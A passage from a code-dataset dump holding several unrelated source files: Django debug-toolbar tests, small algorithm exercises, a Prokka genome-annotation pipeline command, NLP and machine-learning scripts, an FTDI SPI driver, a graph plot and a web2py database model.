DebugToolbarMiddleware().process_view(self.request, regular_view, ('title',), {})\n\n def test_middleware_response_only(self):\n DebugToolbarMiddleware().process_response(self.request, self.response)\n\n def test_middleware_response_insertion(self):\n resp = regular_view(self.request, \"İ\")\n DebugToolbarMiddleware().process_response(self.request, resp)\n # check toolbar insertion before \"\"\n self.assertContains(resp, '\\n')\n\n def test_cache_page(self):\n self.client.get('/cached_view/')\n self.assertEqual(\n len(self.toolbar.get_panel_by_id('CachePanel').calls), 3)\n self.client.get('/cached_view/')\n self.assertEqual(\n len(self.toolbar.get_panel_by_id('CachePanel').calls), 5)\n\n\n@override_settings(DEBUG=True)\nclass DebugToolbarIntegrationTestCase(TestCase):\n\n def test_middleware(self):\n response = self.client.get('/execute_sql/')\n self.assertEqual(response.status_code, 200)\n\n @override_settings(DEFAULT_CHARSET='iso-8859-1')\n def test_non_utf8_charset(self):\n response = self.client.get('/regular/ASCII/')\n self.assertContains(response, 'ASCII') # template\n self.assertContains(response, 'djDebug') # toolbar\n\n response = self.client.get('/regular/LÀTÍN/')\n self.assertContains(response, 'LÀTÍN') # template\n self.assertContains(response, 'djDebug') # toolbar\n\n def test_xml_validation(self):\n response = self.client.get('/regular/XML/')\n ET.fromstring(response.content) # shouldn't raise ParseError\n\n\n@unittest.skipIf(webdriver is None, \"selenium isn't installed\")\n@unittest.skipUnless('DJANGO_SELENIUM_TESTS' in os.environ, \"selenium tests not requested\")\n@override_settings(DEBUG=True)\nclass DebugToolbarLiveTestCase(StaticLiveServerTestCase):\n\n @classmethod\n def setUpClass(cls):\n super(DebugToolbarLiveTestCase, cls).setUpClass()\n cls.selenium = webdriver.Firefox()\n\n @classmethod\n def tearDownClass(cls):\n cls.selenium.quit()\n super(DebugToolbarLiveTestCase, cls).tearDownClass()\n\n def test_basic(self):\n self.selenium.get(self.live_server_url + '/regular/basic/')\n version_panel = self.selenium.find_element_by_id('VersionsPanel')\n\n # Versions panel isn't loaded\n with self.assertRaises(NoSuchElementException):\n version_panel.find_element_by_tag_name('table')\n\n # Click to show the versions panel\n self.selenium.find_element_by_class_name('VersionsPanel').click()\n\n # Version panel loads\n table = WebDriverWait(self.selenium, timeout=10).until(\n lambda selenium: version_panel.find_element_by_tag_name('table'))\n self.assertIn(\"Name\", table.text)\n self.assertIn(\"Version\", table.text)\n\n @override_settings(DEBUG_TOOLBAR_CONFIG={'RESULTS_CACHE_SIZE': 0})\n def test_expired_store(self):\n self.selenium.get(self.live_server_url + '/regular/basic/')\n version_panel = self.selenium.find_element_by_id('VersionsPanel')\n\n # Click to show the version panel\n self.selenium.find_element_by_class_name('VersionsPanel').click()\n\n # Version panel doesn't loads\n error = WebDriverWait(self.selenium, timeout=10).until(\n lambda selenium: version_panel.find_element_by_tag_name('p'))\n self.assertIn(\"Data for this panel isn't available anymore.\", error.text)\n\n @override_settings(TEMPLATE_LOADERS=[(\n 'django.template.loaders.cached.Loader', (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ),\n )])\n def test_django_cached_template_loader(self):\n self.selenium.get(self.live_server_url + '/regular/basic/')\n version_panel = self.selenium.find_element_by_id('TemplatesPanel')\n\n # Click to show the 
versions panel\n self.selenium.find_element_by_class_name('TemplatesPanel').click()\n\n # Version panel loads\n trigger = WebDriverWait(self.selenium, timeout=10).until(\n lambda selenium: version_panel.find_element_by_css_selector(\n '.remoteCall'))\n trigger.click()\n\n # Verify the code is displayed\n WebDriverWait(self.selenium, timeout=10).until(\n lambda selenium: self.selenium.find_element_by_css_selector(\n '#djDebugWindow code'))\n","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"10381781","text":"s = input().lower().strip()\ns1 = \"AEIOU\"\nx = s.split()\ni = 0\nfor i in range(len(x)):\n if x[i] not in s1:\n x.insert(i - 1, \".\")\n else:\n x.remove(x[i])\nprint(''.join(x))","sub_path":"Codeforces/118_A_String_Task.py","file_name":"118_A_String_Task.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"272101803","text":"class Determiner(object):\n coins = [1, 5, 7, 9, 11]\n\n @staticmethod\n def eval(num):\n coins = Determiner.coins\n\n if num in coins:\n return 1\n\n # minimum number of coins for specific change values x\n min_amounts= [-1] * (num+1)\n\n # zero produces 0 amount of coins\n min_amounts[0] = 0\n\n # G(x) = 1 + min(G(x-i)) for all i in coins if i <= x\n\n for x in range(1, num+1):\n minimum = -1\n for i in coins:\n index = x - i\n if index >= 0:\n if (min_amounts[index] < minimum) or (minimum == -1):\n minimum = min_amounts[index]\n else:\n break\n min_amounts[x] = 1 + minimum\n\n return min_amounts[num]","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275768290","text":"#!/usr/bin/env python3\nimport os\nimport sys\nfrom multiprocessing import Semaphore\nfrom iggtools.common.argparser import add_subcommand, SUPPRESS\nfrom iggtools.common.utils import tsprint, retry, command, multithreading_map, find_files, upload, pythonpath, upload_star, download_reference\nfrom iggtools.models.uhgg import UHGG, get_uhgg_layout, destpath, unified_genome_id\nfrom iggtools.params import outputs\nfrom iggtools.subcommands.import_uhgg import decode_genomes_arg\n\n\nCONCURRENT_PROKKA_RUNS = Semaphore(6)\n\n\n@retry\ndef find_files_with_retry(f):\n return find_files(f)\n\n\n# 1. Occasional failures in aws s3 cp require a retry.\n@retry\ndef download_genome(genome_id, cleaned_genome):\n command(f\"rm -f {genome_id}.fasta\")\n command(f\"aws s3 cp --only-show-errors {cleaned_genome} - | lz4 -dc > {genome_id}.fasta\")\n\n\ndef drop_lz4(filename):\n assert filename.endswith(\".lz4\")\n return filename[:-4]\n\n\ndef prokka_gene_annotation(genome_id, species_id):\n # Prokka will crash if installed <6 months ago. It's a feature. 
See tbl2asn.\n cleaned_genome = destpath(get_uhgg_layout(species_id, \"fna\", genome_id)[\"imported_genome_file\"])\n ugid = unified_genome_id(genome_id)\n\n download_genome(genome_id, cleaned_genome)\n\n subdir = \"prokka_dir\"\n command(f\"rm -rf {subdir}\")\n\n output_files = [\n f\"{genome_id}.faa\",\n f\"{genome_id}.ffn\",\n f\"{genome_id}.fna\",\n f\"{genome_id}.gff\",\n f\"{genome_id}.tsv\"\n ]\n command(f\"prokka --kingdom Bacteria --outdir {subdir} --cpus 8 --prefix {genome_id} --locustag {ugid} --compliant {genome_id}.fasta\")\n for o in output_files:\n command(f\"mv {subdir}/{o} .\")\n\n return output_files\n\n\ndef annotate_genome(args):\n if args.zzz_slave_toc:\n annotate_genome_slave(args)\n else:\n annotate_genome_master(args)\n\n\ndef annotate_genome_master(args):\n\n # Fetch table of contents from s3.\n # This will be read separately by each species build subcommand, so we make a local copy.\n local_toc = download_reference(outputs.genomes)\n\n db = UHGG(local_toc)\n species_for_genome = db.genomes\n\n def genome_work(genome_id):\n assert genome_id in species_for_genome, f\"Genome {genome_id} is not in the database.\"\n species_id = species_for_genome[genome_id]\n\n dest_file = destpath(get_uhgg_layout(species_id, \"fna\", genome_id)[\"annotation_file\"])\n msg = f\"Annotating genome {genome_id} from species {species_id}.\"\n if find_files_with_retry(dest_file):\n if not args.force:\n tsprint(f\"Destination {dest_file} for genome {genome_id} annotations already exists. Specify --force to overwrite.\")\n return\n msg = msg.replace(\"Importing\", \"Reimporting\")\n\n\n with CONCURRENT_PROKKA_RUNS:\n\n tsprint(msg)\n logfile = get_uhgg_layout(species_id, \"\", genome_id)[\"annotation_log\"]\n slave_log = os.path.basename(logfile)\n slave_subdir = f\"{species_id}__{genome_id}\"\n if not args.debug:\n command(f\"rm -rf {slave_subdir}\")\n if not os.path.isdir(slave_subdir):\n command(f\"mkdir {slave_subdir}\")\n # Recurisve call via subcommand. Use subdir, redirect logs.\n slave_cmd = f\"cd {slave_subdir}; PYTHONPATH={pythonpath()} {sys.executable} -m iggtools annotate_genome --genome {genome_id} --zzz_slave_mode --zzz_slave_toc {os.path.abspath(local_toc)} {'--debug' if args.debug else ''} &>> {slave_log}\"\n with open(f\"{slave_subdir}/{slave_log}\", \"w\") as slog:\n slog.write(msg + \"\\n\")\n slog.write(slave_cmd + \"\\n\")\n try:\n command(slave_cmd)\n finally:\n # Cleanup should not raise exceptions of its own, so as not to interfere with any\n # prior exceptions that may be more informative. Hence check=False.\n upload(f\"{slave_subdir}/{slave_log}\", destpath(logfile), check=False)\n if not args.debug:\n command(f\"rm -rf {slave_subdir}\", check=False)\n\n genome_id_list = decode_genomes_arg(args, species_for_genome)\n multithreading_map(genome_work, genome_id_list, num_threads=20)\n\n\ndef annotate_genome_slave(args):\n \"\"\"\n https://github.com/czbiohub/iggtools/wiki\n \"\"\"\n\n violation = \"Please do not call annotate_genome_slave directly. 
Violation\"\n assert args.zzz_slave_mode, f\"{violation}: Missing --zzz_slave_mode arg.\"\n assert os.path.isfile(args.zzz_slave_toc), f\"{violation}: File does not exist: {args.zzz_slave_toc}\"\n\n db = UHGG(args.zzz_slave_toc)\n species_for_genome = db.genomes\n\n genome_id = args.genomes\n species_id = species_for_genome[genome_id]\n\n dest_file = destpath(get_uhgg_layout(species_id, \"fna\", genome_id)[\"annotation_file\"])\n last_output = os.path.basename(dest_file)\n\n output_files = prokka_gene_annotation(genome_id, species_id)\n\n upload_tasks = []\n for o in output_files:\n olz = o + \".lz4\"\n otype = o.rsplit(\".\")[-1]\n if olz != last_output:\n upload_tasks.append((o, destpath(get_uhgg_layout(species_id, otype, genome_id)[\"annotation_file\"])))\n\n command(f\"aws s3 rm --recursive {dest_file.rsplit('/', 1)[0]}\")\n multithreading_map(upload_star, upload_tasks)\n\n # Upload this last because it indicates all other work has succeeded.\n upload(drop_lz4(last_output), dest_file)\n\n\ndef register_args(main_func):\n subparser = add_subcommand('annotate_genome', main_func, help='annotate selected genomes with prokka')\n subparser.add_argument('--genomes',\n dest='genomes',\n required=False,\n help=\"genome[,genome...] to import; alternatively, slice in format idx:modulus, e.g. 1:30, meaning annotate genomes whose ids are 1 mod 30; or, the special keyword 'all' meaning all genomes\")\n subparser.add_argument('--zzz_slave_toc',\n dest='zzz_slave_toc',\n required=False,\n help=SUPPRESS) # \"reserved to pass table of contents from master to slave\"\n return main_func\n\n\n@register_args\ndef main(args):\n tsprint(f\"Executing iggtools subcommand {args.subcommand} with args {vars(args)}.\")\n annotate_genome(args)\n","sub_path":"iggtools/subcommands/annotate_genome.py","file_name":"annotate_genome.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147014183","text":"\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\ndef splitTrainTest(inputDF,random_state):\n\n simpleTrainSet, simpleTestSet = train_test_split(inputDF, test_size=0.2, random_state=random_state)\n\n inputDF[\"income_category\"] = np.ceil(inputDF[\"median_income\"]/1.5)\n inputDF[\"income_category\"].where( inputDF[\"income_category\"] < 5.0 , 5.0, inplace = True )\n\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2,random_state=19)\n for trainIndices, testIndices in split.split(inputDF,inputDF[\"income_category\"]):\n stratifiedTrainSet = inputDF.loc[trainIndices]\n stratifiedTestSet = inputDF.loc[testIndices]\n\n print('\\ninputDF[\"income_category\"].value_counts() / len(inputDF)')\n print( inputDF[\"income_category\"].value_counts() / len(inputDF) )\n\n for set in (stratifiedTrainSet,stratifiedTestSet):\n set.drop([\"income_category\"],axis=1,inplace=True)\n\n ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ###\n return( stratifiedTrainSet , stratifiedTestSet )\n # return( simpleTrainSet, simpleTestSet )\n\n","sub_path":"exercises/ML/general/geron-handson-ML/02-end2End/src/splitTrainTest.py","file_name":"splitTrainTest.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"467352894","text":"# -*- coding: utf-8 -*\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom 
nltk.corpus import stopwords\nfrom nltk.stem.lancaster import LancasterStemmer\nfrom nltk.stem import PorterStemmer\n\nfrom textblob import TextBlob\n\nfile = open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\myfolder\\\\corpora\\\\the-old-man-and-the-sea.txt\")\nraw = file.read()\nwordFile = open (\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\myfolder\\\\corpora\\\\stats\\\\the-old-man-and-the-sea-words.txt\", 'w' )\n\nlemmatizer = WordNetLemmatizer()\nstopset = set(stopwords.words('english'))\n\ntry:\n    #use textblob instead of nltk\n    textblob = TextBlob(raw)\n    tokens = textblob.words\n    #tokens = nltk.word_tokenize(raw)\n\n    #1 lemmatization\n    #ADJ, ADJ_SAT, ADV, NOUN, VERB = 'a', 's', 'r', 'n', 'v'\n    all = []\n    for pos in tokens:\n        origform = \"\"\n        adjform = \"\"\n        adtform = \"\"\n        advform = \"\"\n        nounform = \"\"\n        verbform = \"\"\n        otherform = \"\"\n        if(pos.isalpha()) and pos.lower() not in stopset:\n            origform = pos.lower()\n\n            adjform = lemmatizer.lemmatize(pos.lower(),'a')\n            if adjform != origform and adjform not in stopset:\n                all.append((adjform))\n                continue\n\n            adtform = lemmatizer.lemmatize(pos.lower(),'s')\n            if adtform != origform and adtform not in stopset:\n                all.append((adtform))\n                continue\n\n            advform = lemmatizer.lemmatize(pos.lower(),'r')\n            if advform != origform and advform not in stopset:\n                all.append((advform))\n                continue\n\n            nounform = lemmatizer.lemmatize(pos.lower(),'n')\n            if nounform != origform and nounform not in stopset:\n                all.append((nounform))\n                continue\n\n            verbform = lemmatizer.lemmatize(pos.lower(),'v')\n            if verbform != origform and verbform not in stopset:\n                all.append((verbform))\n                continue\n\n            otherform = lemmatizer.lemmatize(pos.lower())\n            if otherform not in stopset:\n                all.append((otherform))\n\n    for word in all:\n        wordFile.write (word + ' ')\n\n    #distinctAll = nltk.FreqDist(all).most_common()\n    #print distinctAll\n\nfinally:\n    file.close()\n    wordFile.close()\n","sub_path":"untitled/work/nlpPreAnalyzeNovel.py","file_name":"nlpPreAnalyzeNovel.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"487632608","text":"#This Driver Configures the FTDI Device with SPI Functionality using MPSSE Mode\nimport d2xx\nimport sys\nimport time\n\nclass MPSSE_SPI(object):\n\t\n\tdef __init__(self,port):\n\t\t#List of FTDI Devices Available\n\t\tdevAvail = d2xx.listDevices()\n\t\tif not devAvail:\n\t\t\tprint(\"Error - Check your Connection to FTDI Device\")\n\t\telse:\t\n\t\t\tself.port=d2xx.open(port)\n\t\t\tself.port.resetDevice()\n\t\t\tdataToRead=self.port.getQueueStatus()\n\t\t\twhile dataToRead:\n\t\t\t\tdataRBuff=self.port.read(dataToRead)\n\t\t\t\tdataToRead=self.port.getQueueStatus()\n\t\t\tprint(\"Connection to Port %d established\"%port)\n\t\t\t\n\tdef DevConf(self,baudrate):\n\t\tself.port.setUSBParameters(65536,65535)\t\t\t\t\t#USB request Transfer size\n\t\tself.port.setChars('0',0,'0',0)\t\t\t\t\t\t\t#Disable Event and error characters\n\t\tself.port.setTimeouts(0,5000)\n\t\tself.port.setLatencyTimer(16)\n\t\tself.port.setBitMode(0,0)\t\t\t\t\t\t\t\t#reset Controller\n\t\tself.port.setBitMode(0,2)\t\t\t\t\t\t\t\t#MPSSE Mode Enable\n\t\t\n\t\t#MPSSE Synchronisation and Receiving Back Bad Commands\n\t\tdataTBuff = 'AA'.decode('hex')\n\t\tself.port.write(dataTBuff)\n\t\ttime.sleep(0.1)\n\t\tdataToRead=self.port.getQueueStatus()\n\t\twhile dataToRead:\n\t\t\tdataRBuff=self.port.read(dataToRead)\n\t\t\tif dataRBuff[0] != '\\xFA' and dataRBuff[1] != '\\xAA':\n\t\t\t\tprint(\"Error - 
MPSSE is not Synchronized!\")\n\t\t\telse:\n\t\t\t\tprint(\"MPSSE - Synchronized and Ready of Data Transaction!\")\n\t\t\tdataToRead=self.port.getQueueStatus()\n\t\t\t\n\t\t#Configure the MPSSE for SPI communication\n\t\t#Configure MPSSE SPI settings\n\t\tdataTBuff=\"8A978D\".decode('hex')\t\t\t\t#3Phase Clock Disabled\n\t\tself.port.write(dataTBuff)\n\t\tdataTBuff=\"80000B\".decode('hex')\n\t\tself.port.write(dataTBuff)\n\t\tdataTBuff=(\"86\"+baudrate).decode('hex')\n\t\tself.port.write(dataTBuff)\t\t\n\t\t#Turn off Loopback\n\t\tself.port.write('\\x85')\n\t\ttime.sleep(5)\n\t\t\n\tdef SPI_CS_Enable(self):\n\t\tdataTBuff='80000B'\t#assumed fix: assert CS low, matching the 80000B...80080B framing used in SPI_Read/SPI_RW\n\t\tfor i in range(5):\n\t\t\tself.port.write(dataTBuff.decode('hex'))\n\t\n\tdef SPI_CS_Disable(self):\n\t\tdataTBuff='80080B'\n\t\tfor i in range(5):\n\t\t\tself.port.write(dataTBuff.decode('hex'))\t\n\t\t\t\n\tdef SPI_Write(self,datalen,data):\n\t\t#assumed fix: dataTBuff was never built here; frame a 0x11 clock-data-out command (little-endian length) with CS asserted, mirroring SPI_RW\n\t\tdataTBuff = \"80000B11\"+datalen[2:]+datalen[0:2]+data+\"80080B\"\n\t\tself.port.write(dataTBuff.decode('hex'))\n\t\t\t\t\t\t\n\tdef SPI_Read(self,datalen):\n\t\tdataTBuff = \"80000B24\"+datalen[2:]+datalen[0:2]+\"80080B\"\n\t\tself.port.write(dataTBuff.decode('hex'))\n\t\tdataToRead=0\n\t\twhile not dataToRead:\n\t\t\tdataToRead = self.port.getQueueStatus()\n\t\tdataRBuff = self.port.read(dataToRead)\n\t\treturn dataRBuff\n\t\t\n\tdef SPI_RW(self,datalen,data):\n\t\tdataTBuff = \"80000B110000\"+data+\"24\"+datalen[2:]+datalen[0:2]+\"80080B\"\n\t\tself.port.write(dataTBuff.decode('hex'))\n\t\tdataToRead=0\n\t\twhile not dataToRead:\n\t\t\tdataToRead = self.port.getQueueStatus()\n\t\tdataRBuff = self.port.read(dataToRead)\n\t\treturn dataRBuff\n\t\t\n\t\t\t","sub_path":"Archived_Files/SPI_FTDI_MS25PE10/etc_spi_lib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"327583095","text":"__author__ = 'shenli'\nfrom Data.DataModel.StockBasics import stock_basics\nfrom GetDataTask import chooseStock\nfrom GetDataTask import runChangLunModel\n\nstartDate = '2006-09-13'\nendDate = '2016-09-13'\nfreq = 'D'\ntradeDate = '2007-09-13'\nstocks = stock_basics.select()\nfor stock in stocks:\n    runChangLunModel.delay(stock.code,startDate,endDate,freq,tradeDate)","sub_path":"chooseStockCelery.py","file_name":"chooseStockCelery.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"578485615","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 12 17:45:42 2019\n\n@author: Daniel Chong\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nG = nx.DiGraph() \nG.add_edge('I', 'a', weight=0.6)\nG.add_edge('a', 'b', weight=0.6)\nG.add_edge('b', 'c', weight=0.6)\nG.add_edge('c', 'd', weight=0.6)\nG.add_edge('d', 'e', weight=0.7)\nG.add_edge('e', 'F', weight=0.7)\npos = nx.kamada_kawai_layout(G, weight='weight', scale=1, center=None,dim=2)\nlabels = {('I', 'a' ):'20', ('b','c'):'70',('c','d'):'10'}\nsize = [700, 700, 700, 700, 700, 700,700] \ncolor=[ \"#2da05f\" , \"#A0CBE2\", \"#A0CBE2\", \"#A0CBE2\", \"#A0CBE2\", \"#A0CBE2\", \"#A0CBE2\" ]\nnx.draw(G, pos=pos, with_labels = True, scale=1, align='vertical',center=None,edge_color='black',node_color=color,font_size=20, width=2)\nnx.draw_networkx_edge_labels(G,pos, labels, font_size=10, font_color='red') \nnx.draw_networkx_nodes( G, pos, node_size=700, node_color=color)\nnx.draw_networkx_edges( G, pos,width=6, edge_color='blue')\nnx.draw_networkx_labels(G, pos, font_size=20, 
font_family='sans-serif')\nplt.axis('off')\nplt.savefig(\"GrafoSimpleDAcicNew.eps\") \nplt.show()","sub_path":"Tarea2/GSDA.py","file_name":"GSDA.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"551658539","text":"# coding: utf8\n\n\n\"\"\"\njust copy paste this code into your model and replace dbMatronasur to something\nyou prefer or what is used in your code, another thing that should be known is that\nthis code still cannot distinguish what exactly should be in reference title - name\nwhen you use generic appadmin so please remove all fiealds you don't need not require \n\"\"\"\n\"\"\"\ndatabase class object creation\n\"\"\"\ndbMatronasur = DAL(\"sqlite://storage.sqlite\")\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"cursos_tipo\",\n SQLField(\"nombre\", \"string\", length=100, notnull=True, default=None), format='%(nombre)s')\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"centros\",\n SQLField(\"nombre\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"direccion\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"localidad\", \"string\", length=100, notnull=True, default=None), format='%(nombre)s')\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"cursos\",\n SQLField(\"nombre\"),\n SQLField(\"id_centros\", dbMatronasur.centros),\n SQLField(\"id_cursos_tipo\", dbMatronasur.cursos_tipo),\n SQLField(\"fecha_ini\", \"date\", notnull=True, default=None),\n SQLField(\"fecha_fin\", \"date\", notnull=True, default=None),\n SQLField(\"hora_ini\", \"time\", notnull=True, default=None),\n SQLField(\"hora_fin\", \"time\", notnull=True, default=None),\n SQLField(\"Finalizado\", \"boolean\", default=False),\n migrate=True)\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"mutuas\",\n SQLField(\"nombre\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"email\", \"string\", length=200, notnull=False, default=None),\n SQLField(\"telefono\", \"string\", length=9, notnull=False, default=None),format='%(nombre)s')\n \n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"alumnos\",\n SQLField(\"nombre\", \"string\", length=100, notnull=True, default=None),\n SQLField(\"apellidos\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"nif\", \"string\", length=9, notnull=True, default=None),\n SQLField(\"direccion\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"localidad\", \"string\", length=100, notnull=True, default=None),\n SQLField(\"cod_postal\", \"integer\", notnull=True, default=None),\n SQLField(\"seg_social\", \"string\", length=14, notnull=True, default=None),\n SQLField(\"id_mutuas\",dbMatronasur.mutuas),\n SQLField(\"telefono\", \"string\", length=9, notnull=False, default=None),\n SQLField(\"email\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"profesion\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"nombre_pareja\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"apellidos_pareja\", \"string\", length=200, notnull=False, default=None),\n SQLField(\"edad_apreja\", \"integer\", notnull=False, default=None),\n SQLField(\"profesion_pareja\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"hijos\", \"integer\", notnull=False, default=None),\n SQLField(\"fur\", \"date\", notnull=True, default=None),\n SQLField(\"ginecologo\", \"string\", length=200, 
notnull=False, default=None),\n SQLField(\"centro_control\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"centro_luz\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"publicidad\", \"boolean\", default=False),\n SQLField(\"volante\", \"boolean\", default=False))\n \n\n\n\n\n\n\n\n\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"docentes\",\n SQLField(\"nombre\", \"string\", length=100, notnull=True, default=None),\n SQLField(\"apellidos\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"nif\", \"string\", length=9, notnull=True, default=None),\n SQLField(\"direccion\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"localidad\", \"string\", length=100, notnull=True, default=None),\n SQLField(\"cod_postal\", \"integer\", notnull=True, default=None),\n SQLField(\"seg_social\", \"integer\", notnull=True, default=None), format='%(apellidos)s,%(nombre)s')\n\n\n\"\"\"\nTable definition\n\"\"\"\n\ndbMatronasur.define_table(\"alumnos_cursos\",\n SQLField(\"id_alumnos\", dbMatronasur.alumnos),\n SQLField(\"id_cursos\", dbMatronasur.cursos))\n\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"alumnos_centros\",\n SQLField(\"id_alumnos\", dbMatronasur.alumnos),\n SQLField(\"id_centros\", dbMatronasur.centros))\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"cursos_docentes\",\n SQLField(\"id_cursos\", dbMatronasur.cursos),\n SQLField(\"id_docentes\", dbMatronasur.docentes))\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"volantes\",\n SQLField(\"numero\", \"string\", length=10, notnull=True, default=None),\n SQLField(\"id_alumnos\", dbMatronasur.alumnos),\n SQLField(\"descripcion\", \"integer\", notnull=True, default=None))\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"nominas\",\n SQLField(\"id_docentes\", dbMatronasur.docentes),\n SQLField(\"documento\", \"upload\", notnull=True, default=None))\n \n\n\n\n\"\"\"\nRelations between tables (remove fields you don't need from requires)\n\"\"\"\ndbMatronasur.alumnos.id_mutuas.requires=IS_IN_DB(dbMatronasur, 'mutuas.id','%(nombre)s')\ndbMatronasur.cursos.id_centros.requires=IS_IN_DB(dbMatronasur, 'centros.id','%(nombre)s')\ndbMatronasur.cursos.id_cursos_tipo.requires=IS_IN_DB(dbMatronasur, 'cursos_tipo.id','%(nombre)s')\ndbMatronasur.alumnos_cursos.id_alumnos.requires=IS_IN_DB(dbMatronasur, 'alumnos.id','%(apellidos)s, %(nombre)s')\ndbMatronasur.alumnos_cursos.id_cursos.requires=IS_IN_DB(dbMatronasur, 'cursos.id','%(nombre)s, %(fecha_ini)s')\ndbMatronasur.alumnos_centros.id_alumnos.requires=IS_IN_DB(dbMatronasur, 'alumnos.id','%(nombre)s')\ndbMatronasur.alumnos_centros.id_centros.requires=IS_IN_DB(dbMatronasur, 'centros.id','%(nombre)s')\ndbMatronasur.cursos_docentes.id_cursos.requires=IS_IN_DB(dbMatronasur, 'cursos.id')\ndbMatronasur.cursos_docentes.id_docentes.requires=IS_IN_DB(dbMatronasur, 'docentes.id','%(nombre)s')\ndbMatronasur.volantes.id_alumnos.requires=IS_IN_DB(dbMatronasur, 'alumnos.id','%(nombre)s')\ndbMatronasur.nominas.id_docentes.requires=IS_IN_DB(dbMatronasur, 'docentes.id','%(apellidos)s,%(nombre)s')\n\n\n\n## by default give a view/generic.extension to all actions from localhost\n## none otherwise. 
a pattern can be 'controller/function.extension'\nresponse.generic_patterns = ['*'] if request.is_local else []\n## (optional) optimize handling of static files\n# response.optimize_css = 'concat,minify,inline'\n# response.optimize_js = 'concat,minify,inline'\n\n#########################################################################\n## Here is sample code if you need for\n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - old style crud actions\n## (more options discussed in gluon/tools.py)\n#########################################################################\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\nauth = Auth(db, hmac_key=Auth.get_or_create_key())\ncrud, service, plugins = Crud(db), Service(), PluginManager()\n\n## create all tables needed by auth if not custom tables\nauth.define_tables()\n\n## configure email\nmail=auth.settings.mailer\nmail.settings.server = 'logging' or 'smtp.gmail.com:587'\nmail.settings.sender = 'you@gmail.com'\nmail.settings.login = 'username:password'\n\n## configure auth policy\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True\n\n## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.\n## register with janrain.com, write your domain:api_key in private/janrain.key\nfrom gluon.contrib.login_methods.rpx_account import use_janrain\nuse_janrain(auth,filename='private/janrain.key')\n\n#########################################################################\n## Define your tables below (or better in another model file) for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\n","sub_path":"models/matronasur.py","file_name":"matronasur.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149923528","text":"import json\nimport os\nimport sys\nfrom glob import glob\n\ninput_dir = sys.argv[1]\ndata = []\nfor input_filename in glob(input_dir + '/*.json', recursive=False):\n with open(input_filename, 'r', encoding='utf8') as r:\n page_id = 